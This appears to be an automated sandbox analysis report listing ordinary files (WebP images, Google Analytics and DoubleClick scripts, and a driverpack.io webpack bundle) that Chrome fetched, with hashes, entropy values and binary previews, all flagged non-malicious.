      Preview:RIFF....WEBPVP8X..............ALPH..........6...5 T..@...*.Q!P!...p.s.*.S.U\..8]..L.M..y-..CH.JM..`0...`.*"...T.;xbY...e.i#b.X..R6E...l.s.|.......N+M.......~...!....Z)...}..[y...`..;..dH..#.9...H=......_..N.mZ$.....H5zR.&...W.,...M.d.{r..6f..7.We.nk..n.s}(.S$...Dwm...'..$.\...J..s%..fH.)g(.1K=I.6.6.,.{...A....r\i...(...>nX$...A...Q.i.D.....Y...O..4M.m.%.1k.$..H..cI..@z.^.y.D[.I....J/%}>.h.<I.-....H%.lw".]...$.4H...I:).._JR.L.Mm{.t....%.c.d.]Iz..l.$.c.dk'....;...&..=....@.kI..$...&.t..X.J........=..'I..I.:....>.y.....l6....9..o%.m.._J.}'...=P.5....A...^.<.H..s_..aj...|....C......+....1.$....B~.<.mXF..c...(........r).W...I.....Z`......8.'.m....pz..M}(.0..#.m...-.....0>N..].....uv..[I..1.d;......._C.?q1,..{.N'...%.k..Oe.m.2P.>.B.8..+..E8...d=.Y......2....*&. w.....pzS.J.H........@q9i......V7...).Nd.+...2?.@.U|^.H..o....[8.d#..e.V...L..TG..].[.Ou.%...J'...s..5...Lw.....n..d..-....BiX.U..t+...Lw.....6..l..b#.4hOB........6<.^..]..>..k.....A(....k..2`
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):5410
      Entropy (8bit):7.95565423069553
      Encrypted:false
      SSDEEP:
      MD5:1F6AB4A071065A1F38CEB0D8D609C9E5
      SHA1:69511596883203277E63132DEE8D7266EF7D7057
      SHA-256:A8B04DB12A2618BE5D3E0F76605BFA309B32BAFE4C164FE0E00BABCBB6C60B9E
      SHA-512:48C2FA6E6016165FD9459232DF761EBE48E137E3E4D78070E574D6AAD2DF9DF88E36F45DAD820F4054530969529F4C0B1C34B3785F1E83B0ED39E618C4539200
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X........+.....ALPH.......j..Y.R...H..$.l. .V[x..,!......w...DP.k.L.P.w.5"&.......+.........zp..Q.+fkf.c..^..(..V.f.....ua@`. "..V.ZL]...E....P`..S.....16.....=i.;.(..........|o.."bCD..~z....[{.V.;. ..s..c...n.d.Y~.3>I8..:S..s....G2uevb...+.I.a.Q..c].s.{......y.{.U.:...."...8..;.l.a.c.q.G...GW..I..$..........M..k..:.3s..DB2.|F.5'.......&...L...Y'.5Y...2...O.M..I3..BQ..<.D@..:."Cc."..B...W*.a.*0.3.VE.&X.."...k.q..8..L..8.=...?...*^..`.]....R..*....M3..BU...Y..AU..._..+.#..d........BE...I..A...$.2${...<......{....L..O...].....D..W.c....#T.A.IS>........!D:JH.BU..q..m.U.4.S... )".A.%......u6N......1.....(..=CD.........9J."%zZv...i...........m<.Cq6Oa.....>h5...U.t]....m...E;L...k.|.!.,+..s}w.mTQ..T+.}.scO........&.QX6YY........R.9L.b..........{x...............s.y.....\..xhs?=y.z.z...?.Wn........Xm.-.......o..pt&..F..16/........J.2.Z....zQ.X.`....<C4.n.X.a.*..0Q1iI9...]'V;.ab..u.UE.._b....SRO.......+`..-....[.VP8 @....M...*
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):63
      Entropy (8bit):4.103091529182877
      Encrypted:false
      SSDEEP:
      MD5:80F7C57A5EDBCD246632442585DD2A6C
      SHA1:2EB3662CE2D00EF781A58F231CFEC0158334FAB4
      SHA-256:6F26301669106143CDD8C66141CE66D7444A5CFD7CD36801FACBF321881B893A
      SHA-512:8CE46A2FA4064400E1B1672AC33A6529F28C1DAA804D676188C4B5C5713F76D535FB97445891F5DF53165D624CDC833B75D2230C7D0B1B4586B37621E610C3E5
      Malicious:false
      Reputation:low
      Preview:Failed to deserialize query string: missing field `sentry_data`
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:HTML document, ASCII text, with very long lines (3716)
      Category:downloaded
      Size (bytes):10148
      Entropy (8bit):5.4970596313144355
      Encrypted:false
      SSDEEP:
      MD5:7B55E9D6CBE5A4F2118009FA1752AA13
      SHA1:745F1EA970B1CBCC7E8943A47677EEDADA59077D
      SHA-256:0907E75AB7F4AA03BCBC01778262ABD0671F8742ABACA30E9816CC90A6B28935
      SHA-512:95E5B014AC7BD04729A0BD31CEAB410FD2F7862EA6A375AADC0E8BE10FB00EF2AFA7E6A6BDCD4F3E6F305BFA2E58FF9296230C4DB0C402A7F310C6304BC92A44
      Malicious:false
      Reputation:low
      URL:https://googleads.g.doubleclick.net/pagead/html/r20230823/r20190131/zrt_lookup.html
      Preview:<!DOCTYPE html><html><head></head><body><script>.(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this);.function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2456
      Entropy (8bit):7.897466475187029
      Encrypted:false
      SSDEEP:
      MD5:64218D4984DC87882BA33F9D22F8611E
      SHA1:BA240C4518057C3BB00776D776EC5B857A8D10CE
      SHA-256:1B430CDA70D929243C22A3C86C649FB51151442AABC0EF7CFF89DDF1F8772B88
      SHA-512:550A897A01F40A411465C5C2FE16608BF8488042A0DDF0FFC9D82FB50F5C17A30E8D9B927308B8F260924808D21D6E61DDF632B965730E55DD248938BD702228
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X..............ALPH......rk......k$.}.........D...g.De...u..mw...d..p...h..........g..I..H. H../.$..$.^...$H.$.s...9......@. .. ..$.....$..$..$A. A.$H. H.._... H.$1.'>>......[UU..N..^t.TU.:..~.I..TU...g...j7..v.N.;....s.NU..e.4....i7..q!..)e...g..I.R6....oI...o..].!E.i..CJ..&~%..N&.Re[..p&.Ty4a.M...2.Ou.f.VM..M..(lu.....4.|...........1g...&....~3.]..SA..tz$bf.....Y&....:..6..n...*1~.iz$~..{.W../!..yA.am.1d....C.%...)IZV&...o$.L..E..:...e..NU.Ir...k+.N.......s'....s.s!.0s"}......>....I..B.q......z..T....7U..w..X4...P..........>..O...a..>.z..`..[..7....v..!.h.ES.&..5........g..Jh...%...S.LN..........)...7...'M..$..../.?u.)...f.R.S.m.*...m.ia.....d....d[E<.zN.{..6..oR.W....E.\G..M..19.]se..G.pX5...>.D........7.\..>.q..{.w........|.VP8 |....,...*....>.`.L(&#.,.k9...dn.^R._..."..~.].&.................^`?`.d=.....v..N.e.o..........\/.o...o./k........'+..a......a.5.@ex.Q...j..3c....$Tl..K.53...M..@vy.-......pvP.Ni...&s.!Egf.n.(..}.@{.[..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (1024)
      Category:downloaded
      Size (bytes):883531
      Entropy (8bit):5.373293557750429
      Encrypted:false
      SSDEEP:
      MD5:2BDFE43E36976F4D88A041799D9E61AE
      SHA1:1E96C18D4C1CA84D775B07B12BD7E6F37C9F551A
      SHA-256:CED00FA31832A0B5346DFAD018183CF98AAD5803A69F8F36858F8ADF81BE1D3B
      SHA-512:4D800510C5C6A773A01B978BAC708B40A72FCBA8838235EE109281066C7470ED2EA1B2129E19378CF9AAF7EC9B703E635E6BD64A4D30164A05BF9DE30E4C7ED1
      Malicious:false
      Reputation:low
      URL:https://driverpack.io/build/main.4f8b1f6d1efea490a16b.js
      Preview:webpackJsonp([0],[,function(e,t,n){"use strict";t.__esModule=!0;var a=n(737),r=function(e){return e&&e.__esModule?e:{"default":e}}(a);t["default"]=function(e){return(0,r["default"])(e,{allowMultiple:!0,errorWhenNotFound:!("undefined"!=typeof window&&window.__LEGACY_BROWSER__)})},e.exports=t["default"]},,function(e,t,n){"use strict";var a=n(874);a.keys().forEach(function(e){var n=e.split("/").slice(-2),r=n[0];t[r]=a(e)})},,function(e,t,n){"use strict";function a(e){return e&&e.__esModule?e:{"default":e}}function r(e){return function(){var t=e.apply(this,arguments);return new Promise(function(e,n){function a(r,o){try{var i=t[r](o),l=i.value}catch(s){return void n(s)}if(!i.done)return Promise.resolve(l).then(function(e){a("next",e)},function(e){a("throw",e)});e(l)}return a("next")})}}t.__esModule=!0,.t.onClickDownloadButton=t.openBuyPopup=t.toggleDownloadPopup=t.setAppPaymentStatus=t.setDownloadPopupType=t.updateExperimentState=t.getBrowserName=t.loadProductsData=t.detectLocaleSwitching=t
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text, with very long lines (2343)
      Category:downloaded
      Size (bytes):52916
      Entropy (8bit):5.51283890397623
      Encrypted:false
      SSDEEP:
      MD5:575B5480531DA4D14E7453E2016FE0BC
      SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
      SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
      SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
      Malicious:false
      Reputation:low
      URL:https://www.google-analytics.com/analytics.js
      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):4298
      Entropy (8bit):7.951429321434831
      Encrypted:false
      SSDEEP:
      MD5:23A47DE6307359CE263C16F1598EED57
      SHA1:B0609E3BD7A1815E4A27F3EB972DE25DFB1D7F88
      SHA-256:B8BCEA08C2D2099FD07B0F4DB19A27C2448FEDF7DB542355131166398E90FE19
      SHA-512:FD4349628C8D5409664F42632E386B44E4E7F5D7D466DABD874B3DFA83547CF0B7C9104CE10A95FAFB8C8124B2DD09A6B8D250B06120A3F747C1D7D385A2B015
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X........+.....ALPH#.......v.F..%.c..v7.`...9... ....kOO,e.s.P...>%P.o....$G..C.=..2.7........@5m.K.Cn.o}.1...I.7.w....A..y.....6..........H......R.%....s..si^b...c}.J.....J.yDe\.05?*6..+.!....&.....r.f...C.........-........VN..l8f.a+.(.G./...X..v.c.|.....Vq...U,.Wq....A.k.^..t................!....iGh..K>..}...3:..f.x6.L...z..?......|.~*...E...I..O.@:...h..aB.42Uuo.D..9....q...G.l...9A..{....k|.z..U.|.C(....W.JD..[..y...H...B..f......b.......@..6..~(..]. .yz..wt.......X.......l.8....3. u.q...f2.x../...KA.g).9.T.L.KGG)(....A..`CA Sy..G..VP8 x....L...*,...>.D.J%.#$......gn.sA.......p....B.uy...w...YE.w.?..:.|..s.,.0....vh.`x.P..'..._.}..E.A......Wo.....?...M.h..(.2.68P.e.lp......I.}....2.8P.3..h...(..0E.N~)...v...,.../....6.#.L...N].....6..bC.....8{..q.....e.G..C.C*y....3=".i..Y..&.q.U.LZ........|,P ^=..>.};.......:.{<.....mD(...._.....z.B&a....zi.*...2..\.#1....~....hQ..'8.....|...CF..P..=..H(bLw.#\..(..l..#....Mz..T....=.w ..e
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1442x688, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:dropped
      Size (bytes):15968
      Entropy (8bit):7.987077035537332
      Encrypted:false
      SSDEEP:
      MD5:DDEBA63D4FFF4A10E4D004D980DCBFDA
      SHA1:CA4685858824C3830BE0CEAA6D90B89629D6DB6F
      SHA-256:FCD0D9175EDF5A1B633C12D77F9C842E712CE13C23939F91E865A3B271784BE5
      SHA-512:808C640F8AFD226D0446AE7DB285E52CD8C2D2DE00EC3C960D3528620084A38A27369E1EA6C518B691C5B5AE0985A54CAB9CBD206A66E11F620BBFDE4194F5EA
      Malicious:false
      Reputation:low
      Preview:RIFFX>..WEBPVP8 L>.......*....>.f.Q(:..$.y{...in..!.9..g.F.z......Z.:.3...}@74=.........q........\>o..]n......_.~....B.y..n......7m....b.;a.5r...y.J:7..P-.)U.............9...u.....lQ@..*....K...=..z...z..X.Y.W7z..\../..<<L[...k.-=Q.q..o.....(I@.>.+....cm.).f..j.W...7:.S.$....m..0LA.)..y.gx..q.p...W...r1K..o.>...i^..M;Pov.L.p.3a.*8..~.t....u...}.i...S....}.8.Op#V}Dj.b...l...z...7$..j-...W.a..j.o...=.......*.c9.h......_iDX...J..y..!~.!.~.....,..V ...%M7f.9n...+......Zy'..D.o..#.. E.D.<....A.?/|.qs{.a.K-j......)..}..n..(.F.U....W.>..Z.C!.x*.(.._Fg.n......l2.....l.c.......T.C.J.3U"..0.&UH6<....l......Q`p..UQna.W.5....".<..Y..a..R.....'?j=`4b..w..Y...Z.IQ...r...4.*?iG.|$r^..j.^0K;.x..M%.&Y..L..~....I....!1.MH.Q....Ob`y.8I"..QGT..3>.$a.~...Km%)~....>@.c..@.Ta.:..RT.qY5.......k......1...m...u*....Rh.. ....U.8........X...<..s..uPc..{#.1m.....!...X...s1.5p.Q.~....!.i%.#...H-By...}....)..r..p#.<.{.`.Q.e.....v..._.(.S..XkU...9.-$....)J.0
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1086x384, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:downloaded
      Size (bytes):11856
      Entropy (8bit):7.982456113887909
      Encrypted:false
      SSDEEP:
      MD5:945379446A1F41F75473858B29BB2472
      SHA1:810BD551039BB36EBDD51F02FBD05F6D7CA1809F
      SHA-256:1E6D0DE2EEE9B417A69F42C829CB06923233F3324C68D87C5B32CBBD9FC889C2
      SHA-512:FCE7295A9A7D88318CD5A09C0983345BB9920259D2E31DD7B4E1FEAF938D2C129E303652EA96A0DB6168C920F0FBABE29CFD587BC07C94D6A11F87FB2463EDFF
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/landing-video-nvidia.webp
      Preview:RIFFH...WEBPVP8 <........*>...>.d.Q(%-....)...gn.....j.."..8..L.w..;.O.n...J....~....B..~...z+...3........3.A...-......;l..6.q...O.....^...&.Z.._.ru.p.{.j.@..........f.......?7.\F..M....na...*..0>...".lf..4_p.p.b...;..M5....c.k....4g....UN4./..a..$...W....= ..!.6."=.Q2>nN ...y.....-9..LT.Y...W..fO^X:.L.w.mv..2.nhD..@.....F>...6.XC.= ..8.i.K...?c.......2.S.w*+.xb..)..:.....h....Yd...+S....Z......lS...}.-D.......f%.\8...%.....= ..8.....Y.@~..a....Y...[lg=r..1.-..Y..B/i0.PZ...._.$F=...s.w..r(..uR...4.@...7....i.<.L'..De.J..OH6.4./..T.iF.E..".../Fc.?............0i....Q.uc:y-HB..90..!..a..K.(M..l.N]..[.\asA}..X'..7.........3_*.f.(#..K.\+@@T.I|]......IX....J.t..&...F..!$.wO..D...+(.i.%S..F>..o.m....}c.i.>.V.1Q.a.= ..7...?$.[P........{.3.S.f...< ..:9.2...V.Q.@%.....d|.....R..'..5+&O.L...-R...6.._|...P.o..+..m._..).$..5v.......@.g..Y..F%b6.X..........Y....].-F[v.....B=.t......^o9..o.h...D.4.%..x.kk.Q+......m.............#..@8.c!.....t"/`a
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:downloaded
      Size (bytes):2886
      Entropy (8bit):7.9284273842669615
      Encrypted:false
      SSDEEP:
      MD5:81402C87BD4F025496D3DB12C3B721B8
      SHA1:8FC33A244B9222F15E75E60AF10CAC42850E8242
      SHA-256:D235396B0416CF09BBF14D01CF5B90A0E42BA9B012528711ED403D86AFC4D5AF
      SHA-512:5F9578FFD7F67C8AB1BACAF926B41F8017D25147F7C348D67155C3472D3BDA5A3CAC26489B8A3EDD4FA24284FF09A93CC34C802A3AA3D69DED235DA24EA5EA7A
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/top-video-cards/radeon-rx-vega.webp
      Preview:RIFF>...WEBPVP8X........+.....ALPHR.....T.n.[Bqa..0.....F.a.A .Y.5A.5.+.....................`.F..f....Sq3[/..ukf.Uc...s...7.9k.QD...8Q....p.e.......!-..yn..Y.1..3......S..4.1.0zk'..v5..UUc.-.......j9.FaF.7.g.u5..U5.("..C.........p...O\.....p.:..N..%u8.{T.)=..F.#.c.Dx....C...N.{..N.=._@u.t.6u...P....DV.J.~..C.g.............r1/...c."".....%.UU..p..6..[.....c.("..u..C...k[.l^...Bh..L~n....a.O.......n..\P..)....!.."..(.Vvb...nT.r=$g.Q...rK).H.jf....tN..........K.....@..WJ)s.wN.4....m..Di....Rj....<.....{....8.i...0..?.H.}..7N.....m.....7"....J~k..(...K4.h.Z<..6.....oI....d.......~.&..".3........VP8 .....2...*,...>.F.K......I....gn.a.Q.\zm.....?/.V.>z.I....-...U...!'hWc......W.....~............A}......v3.).K..^ ....m..]...:..T}+........%.c.W...<+.>... ..[\....a..X..B...M....1....*..g<.. .../......8a..DgL...._.l....0Is...9W..4.i.J\.~...a.....f. e1p..Eh.y..j.......'.ml...+.z...vSM...<e_....$.Ph..D_.....6.I..Q..z...:Br........agf...q.....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1020x629, Scaling: [none]x[none], YUV color, decoders should clamp
      Category:downloaded
      Size (bytes):15278
      Entropy (8bit):7.982362476561921
      Encrypted:false
      SSDEEP:
      MD5:C2D7A77BF23AF19146D403CDF7B99EED
      SHA1:1C0F3A5122A2337FA5E6218BACB01DDF6277259A
      SHA-256:D11738F59751AE4471433934E439D81A10FBF75BBB4BA481416B6016B651F433
      SHA-512:230C7BC7DF4098CB7E343C3555FA4E3DA12B911A227E2F6760F495634930B68F858792CB2A235578C43026E744CB6CB740ADD58A7B79AB09469E737C76346740
      Malicious:false
      Reputation:low
      URL:https://static.driverpack.io/pic/screenshot-1.webp
      Preview:RIFF.;..WEBPVP8 .;...t...*..u.>.f.R(%$7!......in.[....Xw......r._..?.......?.g:.wO.?........_..A}...y.{......;....`/._..1.............?....W.'......x...|...........1E..bC.X.|K./.c..,|.%......>_....X.|K./.c..,|.%..K.^..@.(.yCp~Uu'U...P3L^...D....^d..1...*St;.i.w..Z.0~...?......~...?......~...?......q.........@.|.a9.....D..Bo.+@...J..&......D..Bo.+@...J..&......D..Bo.+@...J....z..?....i...<-..Q.o"..R."....}..&t_r".I....RgE."......`......xE.."....}..&t_r"...E.:/..s.....&t_r".I....P5so._yW.j.....>....$...Sg....V..u6-..F..H.p.....&t_r".I....Rg..}...0.|...\..s..x.!c8.O..x...G...........O(..bA%.h,..._Z....}j1...(......T...Z....wXA.k....?......6u+t.i<E..D\)3.....L..E...t.r"..{."xE.L.."A. X/...j......$.Z.(....r.....8........Z...#..1{..B"....f9.76.#.qa..E.s..o.|...Q..PZ.'.]h.P....o...w........r....8.....wJ.(.....".-...N..0....`..I...ea.. .Y..A{.......Y.....z...~.,,w......9y.[.dp..t.F.........K..nUV.0^6....o..<...#APp...y.g$[+T.....(....
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:PNG image data, 250 x 437, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):1641
      Entropy (8bit):7.299065774170251
      Encrypted:false
      SSDEEP:
      MD5:1B7422103B4A5B076717C46EFEFEF861
      SHA1:28704AE5DA811D732C5523D51ACCB21B0AAAD1D8
      SHA-256:E2F483B693447DA7C5AC45998335493471CC166426C251636A1AE52339C8AC9E
      SHA-512:3EE23E380B2A6CDA424541903355C9B3B187F3EB71789339C9E79B29CEF6438913A4201215BE0119D12898EF99E79182B740D9AA50F9ED7EEA4A9B6C0F98BE12
      Malicious:false
      Reputation:low
      Preview:.PNG........IHDR..............K......PLTE............................................................................................................................................................. .d...4tRNS................................ !"#$%&'()*+,-./0123$.0"...HIDATx^...r.Z....E..H.K.6..Q...{;.......#..g....^...I..6%...4. %.k.aq.........]r....X...%.OnD.=...<_...l.k\..`..9.,P.e...V.I...H....\.....f...{X..8%~D.C..4N...>Fd....Y$..9.=.=1......0...Nn...%g0j0v.....................................].h.......v...d..0.>............-I.8#.....<.5.HNc.:.CJ.M82..........Zd.;...l|{..#..;..g8.....O.z9O~.....Y|,&x\.E.^.......`2..F..+.$..4..L..I.Q..1.....u|....4.&.8.`K....Y.:...w.2..a...c...SB..t..^N6.Y~g..S._....}.#/..Y.ie....s...;..Y4`.O.sh.L.>~...l/.r..6.}....A..%"""""""""""A....W.f....Y-..6.O..c_..{.+.$9..#..L....1".9...=%y....M..v...j9.6.w"""""""""""""""""""""""".D....$..)J.".a.dZ..L`.....|.S.k{Y..>n..j....k.{.}wgy.j.M....~.$7..1$O...cD^.jf..I..G\.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):4316
      Entropy (8bit):7.943465581554763
      Encrypted:false
      SSDEEP:
      MD5:937B798ADF7D7FB9A30310CB0E72BEEB
      SHA1:1F2FA698ADFEBDA81ED3A83680A277E12828DD75
      SHA-256:6B766E1E2B3DE35A43C17EE60CF19EFEE5345605007F7F3C30DB3D051DD58782
      SHA-512:B73A30F1B31DAAE65DEF8E795EDDF633C1BBC735A2C2035109CC3D212327CBB034DB85FFFD939FBDFEFAAC12CFCC8E9C793441B29898BBED13E3AB1988744126
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X..............ALPHL.........V..a....]f...Yk..@.c...f.c.G#.>.c.T.H`..Iea...XXX.YX.....c.X.l,,,l...............&"&...........t.X./[.......).N.Wg.v.....l...v..V....]];.H'..X;im.Dl.I.N..T..P.......=.oLY4...[.....r...;.R,?*/U.....`..M'=.e....dz...L..(....wi....9..S.YP[.cF....>vL.-..,.....%#.dz....r<.3..3..S..;....`....'h.....0.Tdv.n..v_.$.t.7=..}......s........].:$,.]).>+...I.....*0".....n8d.n......."..Cw.sd.6.{..OiI.Cd.6."..\......n..cF.d..H.... ..}......E...C..2:.Y...t..rN...d....$vF...[3.^....0.>%;b.....o[.3pK.V.....%#..I.,..u..j......Eg....1..c......I.s...(..T..\4~W.....j..K....w$@.%......S..B.oY.8...9....nel..Cn....\...G1.G.u.Q.z._......N...I..i3..*8.N.D.<;&.>.%B.....a....t...Q.LfY...}..J..;WE..CG.sM.4O .ikw/...H....R...W.....P9A.XF..t.1..P.efVo..5...J...3.......G......QS.K.p.p.s9ZM.-{h{.#....2.......Eta.:[...f.J..9..e.g./^]I^lA{Y(?Ex.d..]*S....%...D....-O.%[.)S|)..CZ"*...eW...&B./...Q..xU._..Otz...=...p....':a.......k.z.
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):6582
      Entropy (8bit):7.958582959219244
      Encrypted:false
      SSDEEP:
      MD5:C96B0E0B140B0E10D58E387D5AF793C3
      SHA1:4FCAAAFACFDFB9FCF6F9EA368517E5570A1724FA
      SHA-256:ADFC828C10575F9B754D63A834C52F0FE68E86CAFED48E5402D7BD769DE414DD
      SHA-512:B0428EE399D33FF7A11D0B8A0F2E92B968214937B6DC839C8EA264D2952DEBA74402F7B824829C3E33C9320BC19B5A8B6E1338585B9D79DD005D77C01A95A747
      Malicious:false
      Reputation:low
      Preview:RIFF....WEBPVP8X...........q..ALPH.......m.9...7...........A...1t.J..G..m......rO...^.y....f..*...L..y.n8.$-.P...p..d.q..N.+..#b.|`..E....%Y..a0..e.`...X..Y...a~z.$.r........y.^.1........V..%....,.H2.........b..).......&..p..3.}0....>.l...>.l.|>K..ad...p......g.|8K..!...|V...,.....#.B..Y...."...^zy.=Kl....z..Ab.{...{M.d.W...8..g].....4..*.I.[pH`3ya.... -.....o....m.2.~...l..&.pOM.v.~...4.?...0.{i\v.C/|nC........E.jpz............5.z..\.................9..7.a..?.WxG8..p...]...9....1..e.9U.......Q:.^.V....Mn....{_U..[....\?....'.'.}.I.....?zo.;....o9...5N..9.7.>.#4..t..v.S...r3...?.z.d.).]U2x.......6[.d.]M<.j.%..q.%ZN.+..S.9g....l^....9.C....3.CL.h).WPnj........#...r..tQ...Jb...d..M.....m....R...4.PJ.ZY..g...Zp.(L..SXu<....Z.#...>.)..........D..$[.5....`A.e.....V].jj.....pPs.)D....d.. ...G......BY./..z.....){.LGy...f........".....S.....Jr..I..^....)..Et.[,......t.^-.6a....p....cdl5.U.....N6E.%,..T.z...cW.}..u.....c\.ge.+/.xEr..Q5..Q.$........i
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):2096
      Entropy (8bit):7.866840724589838
      Encrypted:false
      SSDEEP:
      MD5:DED67B48B7BC9B053F1F6A0A32598360
      SHA1:8769C1B6A1D7A6A22DCFD6936DC5FDF836025030
      SHA-256:11202BA77437BDE036881DCAE9B550671D3EB330C2FB1DD58BE155EC3D604C5C
      SHA-512:2EA3121EC2DBBD12F8B2BCEFEC8FB8DF4FA37D52C3FDF6EEC192F2EF9B237A03B3A8441257A7B980D5FCEC24F2AFAA7AFC27F336CC7392A3F0BA43B9A605340F
      Malicious:false
      Reputation:low
      Preview:RIFF(...WEBPVP8X...........m..ALPH,......l..\{C2.U..Ec..X,..Y...gC.>.j..C.xT...."yEg........@........../l../~.$o..H..t...:.....9de3L.?..._/...7...7.T.Eo..zc0...`&z.1.*.;.ld.....\W68_. ..H..VC.._u'6=|..\y..*.....3.]........5x.....9.l.q.s.%..}...\B.\x..y.n(.5.U.o........M.;.T.....XB...mKy.B.0.hou.?...w..&j.j.^..1...Ug`.I.e.pt..*..*...$gp..3(..G*A.7.*.......&m../.a.-..c....6>.........@...(...m.|..g0.b$V\...;}.......9..]!"!..GE.\....) f@.E.U....@.(..C+.g.~=.{. a.H..'.b`&..rE.0.....t.w0l.P(?.....V@Et..W2mh.."..e. .c....H.B`.mJ....x....3..p.|...X..".u...q.W.J.1w....'..."...:....r..=.......9...h.r5..nc...`..'1.8~.wc'..l.S\..[]..u$.W..(...:#D.....>...2.......q.)..hQ.[....AZ..F.s.p........W..`R.#u.>6...m.D......X}.w=.. 1.@..?h/..@...R.Og.X..J....k.h.RGI$VL...k..<...._.U..2.........=-.C....'R.....]$d. .....S"..M]._...VU..28.....)....,..!..*C.>.y.GD!....8...;-.U...}........P..T.../~j.......P.....]...j""..r,.8.'.w.K......k.S.`.y3P.C.ZL}=.... .M9)..
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:RIFF (little-endian) data, Web/P image
      Category:dropped
      Size (bytes):4680
      Entropy (8bit):7.9477229110845675
      Encrypted:false
      SSDEEP:
      MD5:AE79D3118FD504DA42C0715E5155CAB2
      SHA1:7A925E5A612402CC20625A6764EF099AE8E5E82F
      SHA-256:141975C1F8C2B2407AB15D7261444F8552470DD793D4E7AD38E8FBCD2DF79715
      SHA-512:CF3238721FF78582676735E2E99823877C73E7BA402F932597B46CCCDFE1DF1709335EE01CFD6B98C1F23ED9A94170CCD958DFF092574827BDFE3FE67A3C2AA7
      Malicious:false
      Reputation:low
